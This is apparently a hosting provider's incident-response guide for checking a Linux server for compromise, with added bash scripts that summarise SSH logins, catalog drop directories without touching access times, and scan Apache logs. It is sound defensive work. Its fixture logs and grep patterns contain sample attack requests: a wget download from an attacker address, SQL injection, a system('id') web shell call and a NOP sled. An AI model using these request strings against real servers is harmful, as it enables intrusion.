Checking Hacked Server


Categories of server:

1.1 Webair managed client server: Webair performs custom configuration, maintenance, and optimization of your server for maximum performance and reliability. A list of fully managed services can be found at http://www.webair.com/

1.2 Self managed client: the server owner is responsible for managing their own server. A self managed client has root access, can customize the server, and can install whatever applications and software they want. Self managed clients must also apply their own OS and application updates and configuration for security and performance. Other server maintenance, such as hosts files, email settings, and the server's security functions, is the owner's responsibility.

If you are a self managed client and want some useful commands to check whether your server has been hacked, see below. If you are a Webair Managed Client, we already do this for you!

Who is on the Server:

$ w

$ netstat -nalp | grep ":22"

OR

$ w && netstat -nalp | grep ":22"

w lists everyone with a login session and what they are running; the netstat line lists every connection to or from port 22, which also catches SSH sessions that never opened a shell (port forwards, SFTP). On systems that ship without netstat, ss -anp gives the same information.

Who was on the Server

$ last

$ grep ssh /var/log/secure* | grep Accept

$ grep ftp /var/log/secure* | grep Accept

last reads /var/log/wtmp, which anyone who has reached root can edit or truncate, so a list that is empty or stops abruptly is a finding in itself. On Debian and Ubuntu the equivalent of /var/log/secure is /var/log/auth.log. FTP daemons usually write their own logs (for example /var/log/vsftpd.log or /var/log/xferlog) and leave only PAM session lines in secure, so check those files too.
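Reading the Accept lines by hand works for a handful of logins but not for a month of logs. The script below is an added example, not part of the Webair page: it pulls the successful SSH logins out of a RHEL-style secure log and summarises them by method, user and source address, lists root password logins, finds addresses that failed before they got in, and picks out FTP PAM sessions. The log lines in SAMPLE_LOG are constructed for the example; on a real server point the functions at /var/log/secure* (or /var/log/auth.log on Debian).

```bash
#!/bin/bash
# Added example (not from the Webair page): summarise successful logins from a
# RHEL-style /var/log/secure instead of eyeballing raw grep output.
# SAMPLE_LOG is a constructed fixture, not real log data; on Debian/Ubuntu the
# same lines live in /var/log/auth.log.

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Mar  3 10:12:01 web01 sshd[2231]: Accepted publickey for deploy from 203.0.113.10 port 51022 ssh2
Mar  3 10:15:44 web01 sshd[2302]: Accepted password for root from 198.51.100.77 port 40211 ssh2
Mar  3 10:16:09 web01 sshd[2310]: Failed password for root from 198.51.100.77 port 40215 ssh2
Mar  3 11:02:33 web01 sshd[2450]: Accepted password for root from 198.51.100.77 port 40490 ssh2
Mar  3 11:30:00 web01 sshd[2500]: Accepted publickey for deploy from 203.0.113.10 port 51100 ssh2
Mar  3 11:45:12 web01 vsftpd[2600]: pam_unix(vsftpd:session): session opened for user ftpuser by (uid=0)
EOF

# ssh_accepted LOG...: one line per (auth method, user, source address) with a
# count, most frequent first. In an "Accepted" line the method is field 7, the
# user field 9 and the source address field 11.
ssh_accepted() {
  grep -h 'sshd\[.*\]: Accepted ' "$@" | awk '{print $7, $9, $11}' | sort | uniq -c | sort -rn
}

# root_password_logins LOG...: password (not key) logins as root. On a box
# that is supposed to use keys only, every one of these needs explaining.
root_password_logins() {
  grep -h 'sshd\[.*\]: Accepted password for root ' "$@"
}

# failed_then_accepted LOG...: source addresses that failed at least once and
# later got in, the usual shape of a successful brute force. The address is
# taken from the "from X" clause so lines for invalid users (which carry two
# extra words) are handled the same way as lines for valid ones.
failed_then_accepted() {
  awk '{ if (match($0, / from [0-9a-fA-F.:]+/)) ip = substr($0, RSTART + 6, RLENGTH - 6) }
       /sshd\[.*\]: Failed password/ { failed[ip] = 1 }
       /sshd\[.*\]: Accepted / && (ip in failed) { print ip }' "$@" | sort -u
}

# ftp_sessions LOG...: PAM session lines written by the FTP daemon (time, user).
ftp_sessions() {
  grep -hE '(vsftpd|proftpd|pure-ftpd).*session opened for user' "$@" | awk '{print $3, $(NF-2)}'
}

echo "== successful ssh logins =="; ssh_accepted "$SAMPLE_LOG"
echo "== root password logins ==";  root_password_logins "$SAMPLE_LOG"
echo "== failed then accepted ==";  failed_then_accepted "$SAMPLE_LOG"
echo "== ftp sessions ==";          ftp_sessions "$SAMPLE_LOG"
```

The failed-then-accepted list is the one to read first: an address that guessed wrong and then got in is either a forgetful administrator or a brute force that succeeded, and the user name tells you which.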

Check what is the Current Network Activity of your server

$ netstat -nalp

$ nmap localhost

OR

$ netstat -nalp && nmap localhost

netstat shows every listening socket and connection together with the process that owns it. nmap does not use that information at all; it simply tries to connect. If nmap reports an open port that netstat does not list, something is hiding sockets from the user-space tools, which points at a rootkit. Scan the server from another machine as well, since that shows what is actually reachable from outside.

What Processes are Running:

$ ps -elf

$ ls -la /proc/*/exe

The second command shows the binary each process was started from. A target in /tmp, /var/tmp or /dev/shm, or one ending in "(deleted)" because the file was removed after the process started, deserves a close look. Also compare the PIDs in /proc with the ones ps reports: a process present in /proc but missing from ps is being hidden from you.

What Files are in the Common Attack Points:

$ ls -la /tmp

$ ls -la /var/tmp

$ ls -la /dev/shm

These are the world-writable directories where intruders most commonly drop their tools and scripts on a Linux server, usually under a dot-name so a plain ls does not show them; that is why the -a is there.

Don't delete anything or make changes just yet; just catalog everything. Do not open files with cat or strings either: catalog them and save that for later, because reading a file updates its access time and destroys the "when was this last used" evidence described below. Once you start deleting things you can no longer investigate how deep they have penetrated. Don't be fooled by a common Apache compromise into thinking it ended there. Many times that was just the broken window they used to get in the first time; meanwhile they are tunneling deeper, trying to get root.
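The following script is an added example, not part of the Webair page, that turns the process check, the attack-point listings and the catalog-first advice above into something repeatable: it records metadata for everything under a directory without opening any file, flags hidden or executable files, and lists processes whose executable lives in a drop directory or has been deleted from disk. It needs GNU find and readlink. The fake /tmp and /proc it builds under a temporary directory are constructed so the script can be run anywhere; the real usage is shown in the comments.

```bash
#!/bin/bash
# Added example (not from the Webair page): catalog the usual drop directories
# and flag processes that run from them or from a binary that has since been
# deleted. Only directory listings and symlink targets are read, so no file
# contents are opened and file access times are preserved. GNU find/readlink.

# catalog_dir DIR: modification time, access time, owner, group, mode, size,
# type and path of every entry under DIR. Save the output off the box.
catalog_dir() {
  find "$1" -xdev -printf '%T+ %A+ %u %g %m %s %y %p\n' 2>/dev/null
}

# flag_files DIR: regular files that are hidden or executable. In /tmp,
# /var/tmp and /dev/shm those are the first things to look at.
flag_files() {
  find "$1" -xdev -type f \( -name '.*' -o -perm /111 \) -printf '%m %u %p\n' 2>/dev/null
}

# suspicious_procs [PROCROOT]: PID and executable for processes whose exe link
# points into a drop directory, or whose binary was unlinked after it started
# (the kernel appends " (deleted)" to the link target). Both are common with
# droppers that clean up after themselves. PROCROOT defaults to /proc.
suspicious_procs() {
  local procroot="${1:-/proc}" d exe
  for d in "$procroot"/[0-9]*; do
    exe=$(readlink "$d/exe" 2>/dev/null) || continue
    case "$exe" in
      /tmp/*|/var/tmp/*|/dev/shm/*|*' (deleted)')
        printf '%s %s\n' "${d##*/}" "$exe" ;;
    esac
  done
}

# Constructed fixture (a fake /tmp and /proc in a temp dir) so the functions can
# be run here without touching the real host. Real use on a server:
#   catalog_dir /tmp; catalog_dir /var/tmp; catalog_dir /dev/shm
#   flag_files /tmp
#   suspicious_procs            # walks the real /proc (run as root to see all)
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
mkdir -p "$FIXTURE/tmp/.x" "$FIXTURE/proc/101" "$FIXTURE/proc/102" "$FIXTURE/proc/103"
printf 'not code\n' > "$FIXTURE/tmp/sess_a1b2"
printf '#!/usr/bin/perl\n' > "$FIXTURE/tmp/.x/kswapd"
chmod 755 "$FIXTURE/tmp/.x/kswapd"
ln -s /usr/sbin/httpd "$FIXTURE/proc/101/exe"
ln -s /tmp/.x/kswapd "$FIXTURE/proc/102/exe"
ln -s '/var/tmp/miner (deleted)' "$FIXTURE/proc/103/exe"

echo "== catalog ==";          catalog_dir "$FIXTURE/tmp"
echo "== flagged files ==";    flag_files "$FIXTURE/tmp"
echo "== suspicious procs =="; suspicious_procs "$FIXTURE/proc"
```

Hashing the catalogued files is the natural next step, but a hash requires reading the file, so do it only after the metadata catalog is saved, and expect the access times to change once you do.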

What version of Linux is running

$ cat /etc/redhat-release

For non Red Hat Linux

$ cat /etc/issue

(on current distributions /etc/os-release is the reliable place to look)

Compare this to the kernel

$ uname -a

and

$ cat /proc/version

A running kernel older than the one the distribution currently ships means public local privilege escalation exploits may work against it. A kernel that does not match what the package manager installed (rpm -q kernel on Red Hat systems) needs an explanation.

Who is the author of the file:

$ ls -la --author

When was the last time the file was accessed:

$ ls -l --time=access

The --author column is only meaningful on filesystems that record it; on Linux it repeats the owner. Note that the access time says when a file was last read, not by whom; if you need the who, an audit rule has to be in place before it happens.

Before you run off and use the cat command, it is good to first check the file type with the file command. Many times I myself have been fooled into seeing a file marked as something .html and finding that it was really a binary.

What kind of file is it (ASCII or Binary):

$ file filename

OR

$ file /path/to/directory/*

Hunting by hand through a box without running an obvious virus scanner that shows up in the process list and tips off the intruder is tedious and slow. Refreshing the locate database first makes the file searches that follow much faster.

Update the Locate Database:

$ updatedb &

Be aware that updatedb is itself visible in the process list while it walks the filesystem, and that the cron-maintained database knows nothing about files dropped since its last run, which is the reason to refresh it now.

If this is a web server, the next thing to hunt for is signs of Apache exploits and SQL injection scripts. This little script was handed down to me from a co-worker and does a nice job of hunting through the log files rather than the long tedious work of searching manually.

Search for Apache Exploit:

$ for i in $(locate access_log); do echo "$i"; grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' "$i"; done

OR

$ grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' /path/to/log/files/*

The pattern picks out PHP chr() and system() calls and the usual download-and-run tools followed by a URL-encoded space (%20) in the request line. The parentheses must be escaped as \( so that grep -E matches them literally instead of treating them as grouping and rejecting the expression as unbalanced. Expect some false positives, and remember that only GET query strings reach the access log; POST bodies are not logged by default.

cPanel:

$ grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' /usr/local/apache/logs/*

$ grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' /home/*/statistics/logs/*

Ensim:

$ grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' /home/virtual/site*/fst/var/log/httpd/*

Plesk:

$ grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' /home/httpd/vhosts/*/statistics/logs/*

$ grep -Ei '(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)' /var/log/httpd/*

Search for Shell Code:

$ grep -F '\x90\x90' /path/to/access/logs/*

Apache writes unprintable bytes from a request into the access log as \xhh escapes, so a run of \x90 (the x86 NOP instruction) is the signature of a buffer-overflow attempt against the web server or one of its CGIs. The -F makes grep match the backslashes literally.
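The following is an added example, not code from the Webair page or from the co-worker's script: it wraps the exploit pattern and the NOP-sled check in functions, runs them over a constructed access log, and summarises which addresses sent the hits, which is what you actually need for blocking and for the rest of the investigation. The scan_all_access_logs function is the locate-driven loop for real use; the log lines in SAMPLE_ACCESS_LOG are made up for the example.

```bash
#!/bin/bash
# Added example (not from the Webair page): run the Apache exploit pattern and
# the NOP-sled check over access logs and summarise who sent the hits.
# SAMPLE_ACCESS_LOG is a constructed fixture, not a real log.

# Same heuristic as the one-liners above, with the parentheses escaped so that
# grep -E treats them as literal characters: PHP chr( and system( calls, and
# shell tools followed by a URL-encoded space.
PATTERN='(chr\(|system\(|(curl|wget|chmod|gcc|perl)%20)'

SAMPLE_ACCESS_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_ACCESS_LOG"' EXIT
cat > "$SAMPLE_ACCESS_LOG" <<'EOF'
203.0.113.5 - - [03/Mar/2015:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Mar/2015:10:00:07 +0000] "GET /index.php?id=1%20union%20select%20chr(112)||chr(119) HTTP/1.1" 200 1024 "-" "-"
198.51.100.9 - - [03/Mar/2015:10:00:12 +0000] "GET /cgi-bin/test.cgi?cmd=wget%20http://198.51.100.9/x.pl HTTP/1.1" 200 77 "-" "-"
198.51.100.9 - - [03/Mar/2015:10:00:15 +0000] "GET /cgi-bin/test.cgi?cmd=perl%20x.pl HTTP/1.1" 200 77 "-" "-"
203.0.113.5 - - [03/Mar/2015:10:01:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.44 - - [03/Mar/2015:10:02:00 +0000] "GET /\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f HTTP/1.0" 400 226 "-" "-"
198.51.100.9 - - [03/Mar/2015:10:03:00 +0000] "GET /shell.php?c=system(%27id%27) HTTP/1.1" 200 33 "-" "-"
EOF

# scan_access_log LOG...: request lines matching PATTERN.
scan_access_log() {
  grep -Ei "$PATTERN" "$@"
}

# nop_sled_hits LOG...: Apache logs unprintable request bytes as \xhh, so a run
# of \x90 (x86 NOP) in the request line is a buffer-overflow attempt. Fixed-
# string match, so the backslashes are literal.
nop_sled_hits() {
  grep -F '\x90\x90' "$@"
}

# attacker_ips LOG...: source addresses of the pattern hits, busiest first.
attacker_ips() {
  scan_access_log "$@" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# scan_all_access_logs: the locate-driven loop, reading one path per line so
# names with spaces survive. Run updatedb first.
scan_all_access_logs() {
  locate access_log | while IFS= read -r f; do
    [ -f "$f" ] || continue
    echo "== $f"
    scan_access_log "$f"
    nop_sled_hits "$f"
  done
}

echo "== exploit pattern hits =="; scan_access_log "$SAMPLE_ACCESS_LOG"
echo "== NOP sled hits ==";        nop_sled_hits "$SAMPLE_ACCESS_LOG"
echo "== attacker IPs ==";         attacker_ips "$SAMPLE_ACCESS_LOG"
```

On the sample, four request lines trip the pattern and all come from one address, while the NOP sled comes from a different one; in a real log the next step is to pull every request those addresses made, hits or not, because the successful request is often the one that looks innocent.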

 
